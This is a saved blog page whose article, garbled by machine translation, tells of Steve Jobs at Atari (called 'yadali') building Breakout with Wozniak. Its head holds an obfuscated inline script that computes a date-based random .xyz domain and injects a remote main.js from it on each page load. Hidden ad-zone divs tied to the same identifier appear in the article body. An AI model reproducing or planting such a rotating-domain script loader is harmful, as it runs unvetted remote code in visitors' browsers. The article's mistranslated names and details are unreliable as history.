<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="With the development of science and technology, smart phones and personal computers have basically entered the era of national intelligent information. Smart phones and personal computers are basicall">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Before Apple, jobs was employee 40 of yadali">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="With the development of science and technology, smart phones and personal computers have basically entered the era of national intelligent information. Smart phones and personal computers are basicall">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/26370654d1d3482aa1fafc797fce1e6a.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/86a267805f77473f9fdd1e996740637e.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/5beeaa9e5d854d64b0b7dade6e05c34e.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/8ece013e9efb440d957f83a9889e8960.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/b05f21b8992b49a5bb810e867acd4ca2.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/848679784b844802bbd19cc93e441b3e.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/be8eea2f476a49ad9cde7450536b5390.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/f55b5ace488a4acbb796b430d4ed0c56.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:48.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Before Apple, jobs was employee 40 of yadali">
<meta name="twitter:description" content="With the development of science and technology, smart phones and personal computers have basically entered the era of national intelligent information. Smart phones and personal computers are basicall">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/26370654d1d3482aa1fafc797fce1e6a.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Before Apple, jobs was employee 40 of yadali | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Before Apple, jobs was employee 40 of yadali</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>With the development of science and technology, smart phones and personal computers have basically entered the era of national intelligent information. Smart phones and personal computers are basically personal standard and hard to leave hands. The birth of this phenomenon is largely inseparable from a company called “apple”. It is precisely because Apple’s iPhone and iPod series products constantly refresh the concept , which led to a wave of innovation from various manufacturers. Earlier, Apple also relied on Apple II to create the era of private computers. All these credits are attributed to the same person:   Steve Jobs  .<br><img src="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/26370654d1d3482aa1fafc797fce1e6a.jpg" alt="Before Apple, jobs was employee 40 of yadali"><br>Jobs is not only the founder of apple, but also a great inventor. Although he is no longer here, his contribution to the world can be seen by all. The digital products he designed have subverted people’s recognition again and again, and it is no exaggeration to call him “the man who changes the world”. What few people know is that before Apple was founded, jobs worked in the video game industry, and also produced a game that no one knew.</p>
<h1 id="maverick-hippies"><a href="#maverick-hippies" class="headerlink" title="maverick hippies"></a>maverick hippies</h1><p>Steve Jobs was born in San Francisco, California, in 1955, but unlike other children, he was abandoned by his parents from birth, but fortunately, a good couple adopted her. Jobs grew up living near Silicon Valley, a high-tech industrial area in San Francisco, so he loved electronics very much. When he was in junior high school, jobs met his best friend, Stephen Gary Wozniak (Woz for short). They both saw each other at first sight and were interested in electronics. Woz was also the Minister of the electronic club of jobs junior high school, so the two “Steve” came together. At the age of 19, he dropped out of Reed College in Portland, Oregon. The online records show that he failed to stick to it for economic reasons. In fact, it was Jobs’s abnormal aversion to the rules and arrangements of the University, which seemed to him that university life constrained his free life.<br><img src="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/86a267805f77473f9fdd1e996740637e.jpg" alt="Before Apple, jobs was employee 40 of yadali"><br>Jobs in his youth<br>That’s because jobs was a real Hippie during the age of the righteous anti culture movement. As we all know, in college, compulsory courses are required. Jobs hates the contents of those compulsory courses most, but he is fond of the contents of art, culture, philosophy and so on in the elective courses. No wonder he can’t stay in school. He was addicted to Buddhism and Zen, so he was fascinated by the holy land of Buddhism in India. But at that time, jobs was not in a good economic situation and lived like a vagrant, so he needed a job to earn the money for his trip to India. At the same time, Atari, a game company, has just stepped into a booming stage relying on several pong game consoles. They need to add some human resources, so they sent out recruitment notices. Among the numerous applicants, there are jobs.<br><img src="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/5beeaa9e5d854d64b0b7dade6e05c34e.jpg" alt="Before Apple, jobs was employee 40 of yadali"><br>Pong brings video games to ordinary people</p>
<h1 id="access-to-yadali"><a href="#access-to-yadali" class="headerlink" title="access to yadali"></a>access to yadali</h1><p>He had no money, no education, and knew nothing about electronics. Jobs stepped into the door of yadali with only a passion. Yadali recruited electronic engineers. Obviously, jobs did not meet their requirements. According to the memory of the people present at that time, the clothes jobs wore on the day of the interview were very strange, and he also had long hair and beard, with a strong body odor, and was a complete tramp. In view of jobs’ Hippie character and arrogant attitude, he claimed that if yadali didn’t admit him, he would not leave, making the company’s security personnel once think that the insanity is to make trouble. The person in charge of the interview that day was al olkang, the chief engineer of yadali. The person in charge of soxin also informed olkang reasonably before the alarm. Olkang was very curious about this, so he decided to meet the hippie boy for a while.<br><img src="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/8ece013e9efb440d957f83a9889e8960.jpg" alt="Before Apple, jobs was employee 40 of yadali"><br>Jobs’s face-to-face look is much more exaggerated than that<br>In Alcon’s view, although jobs has many shortcomings, he has a high enthusiasm for electronics. Although he has no education, he can feel that jobs has great intelligence, but he has not been brought into play. Just as an engineer named Don Langer needs an assistant, Alcon decided to give him a chance to try. In this way, jobs became the 40th employee of yadali. One day, the engineer named Don Langer complained to Alcon, “what did I do you want to do to me?” Jobs is an open heart and aggressive person who doesn’t hide his thoughts. So he speaks in a bad way. Because of his belief in philosophy and meditation, Jobs firmly believes that eating fruit based vegetarian food can help to savour the body, so that there is no need to bathe or perfume. Employees of yadali can’t accept jobs physically or psychologically, but Nolan Bushnell, founder of yadali, likes him a lot, so he arranges jobs to work at night, so that he doesn’t have to face other colleagues.<br><img src="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/b05f21b8992b49a5bb810e867acd4ca2.jpg" alt="Before Apple, jobs was employee 40 of yadali"><br>Usually at home, jobs is also keen on meditation and meditation</p>
<h1 id="single-version-of-pong"><a href="#single-version-of-pong" class="headerlink" title="single version of pong"></a>single version of pong</h1><p>Even if he had a job, jobs still kept in touch with his best friend, Woz. Yadali is headquartered in Silicon Valley, while Woz works in HP company, which is also located in Silicon Valley. When he leaves benwoz, he goes to yadali to find jobs to help him solve technical problems. After a few months of work, jobs saves enough money to go to India and leaves temporarily Yadali went to India for a seven month spiritual journey. Seven months later, jobs went back to yadali to work on the night shift, and Bushnell was planning to make a single version of the “Pong” game. The player controlled the baffle to hit the ball on a wall composed of bricks. The bricks hit can be eliminated, and the small ball can be eliminated to eliminate all the bricks to win. Nolan knew about Woz’s frequent visits to yadali, so he gave the job to jobs. After all, wouldn’t it be nice for a salary to make “two Steve” work?<br><img src="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/848679784b844802bbd19cc93e441b3e.jpg" alt="Before Apple, jobs was employee 40 of yadali"><br>Woz on the left and jobs on the right<br>After receiving the job, jobs immediately asked Woz for help. He told Woz that the game needed to be developed within four days, and that if he could reduce the number of chips to less than 50, he would get a bonus, which he was willing to share with Woz. You know, at that time, the circuit board of a game arcade was usually 150 to 170. It was a big challenge to control the number within 50, but that’s what Woz was good at, because he used 30 chips to reproduce “Pong”. His engineering ability was really immortal. The company didn’t specify how many days the production time limit was. The four-day limit was purely due to jobs’s personal affairs, but he didn’t tell Woz about it. Woz accepted the challenge, and the two decided to cooperate. Woz was in charge of the project, while jobs was in charge of prototype construction and software testing.<br><img src="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/be8eea2f476a49ad9cde7450536b5390.jpg" alt="Before Apple, jobs was employee 40 of yadali"><br>Nolan’s game prototype<br>The game did come out in 4 days, but it’s not an easy job. Although I don’t know how many chips were used, it was controlled within 50. But it is a pity that Woz’s engineering design can be called “masterpiece”, but no one can understand how it is realized, that is to say, only Woz can make this circuit board, which is totally unable to produce in mass in the eyes of ordinary people. But in any case, yadali kept their promise, gave them a bonus, and then found someone to rebuild a circuit board in a normal way. This game is later world-famous “brick”.<br>After completing this arduous task, the friendship between the two became deeper. Jobs had a dream of becoming an entrepreneur since then, and Woz’s engineering technology became more and more sophisticated. Soon after that, jobs left yadali, Woz left HP, and the two built the personal computer apple I in a garage with spare parts, and later founded apple , changing the world again and again to create history.<br><img src="http://maiygu.xyz/2019/11/08/Before Apple, jobs was employee 40 of yadali/f55b5ace488a4acbb796b430d4ed0c56.jpg" alt="Before Apple, jobs was employee 40 of yadali"><br>Hand made soil computer apple I<br>End of<br>It can be said that without Woz, there would be no such achievement of jobs today. What few people know is that when yadali released “brick” to jobs, he paid $700 if he made the game, and a bonus if he controlled the chip within 50, but he didn’t say how much. Jobs told Woz that within four days, a chip with less than 50 chips would get 700 dollars, and the two could share equally, but he didn’t mention the bonus at all. After that, Woz did get a check for 350 yuan, but according to unreliable reports, Jobs himself received an additional 5000 dollars, which Woz didn’t get at all. Woz learned about this in a dinner with Nolan later. Although he was very sad, he didn’t care too much. He thought that jobs didn’t mention it to him. Maybe there was something difficult to talk about, but he still hoped that jobs would be frank with him. If he needed the money, he would give it to him without hesitation. After all, they were friends.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/" rel="next" title="Before wild escort 2 log into PC it's very good, but the player can't give it what he wants">
                <i class="fa fa-chevron-left"></i> Before wild escort 2 log into PC it's very good, but the player can't give it what he wants
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/After making several independent games, I dare to try 3a. Next is perhaps the most ambitious studio in China/" rel="prev" title="After making several independent games, I dare to try 3a. Next is perhaps the most ambitious studio in China">
                After making several independent games, I dare to try 3a. Next is perhaps the most ambitious studio in China <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#maverick-hippies"><span class="nav-number">1.</span> <span class="nav-text">maverick hippies</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#access-to-yadali"><span class="nav-number">2.</span> <span class="nav-text">access to yadali</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#single-version-of-pong"><span class="nav-number">3.</span> <span class="nav-text">single version of pong</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
